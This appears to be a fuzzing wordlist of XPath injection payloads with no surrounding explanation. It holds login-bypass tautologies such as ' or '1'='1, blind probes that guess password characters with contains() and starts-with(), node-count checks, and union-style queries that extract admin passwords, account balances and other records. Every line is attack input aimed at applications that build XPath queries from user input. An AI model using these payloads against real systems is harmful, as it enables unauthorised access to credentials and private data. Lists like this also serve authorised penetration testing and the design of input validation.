' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
')] | //user/*[contains(*,'
') and contains(../password,'c
') and starts-with(../password,'c
count(/child::node())
x' or name()='username' or 'x'='y
/key/text() | //emp[true()=']/id']/
/users/user[username='$username' and password='$password']
admin']/password/text() | //users/user[username='guest']/email/text()
']/key/text() | //accounts[accountid='12345']/balance/text()
admin' or '1'='1']/phone/text() | //orders/order[id='101']/status
']/attribute::id | //user[@role='admin']/password/text()


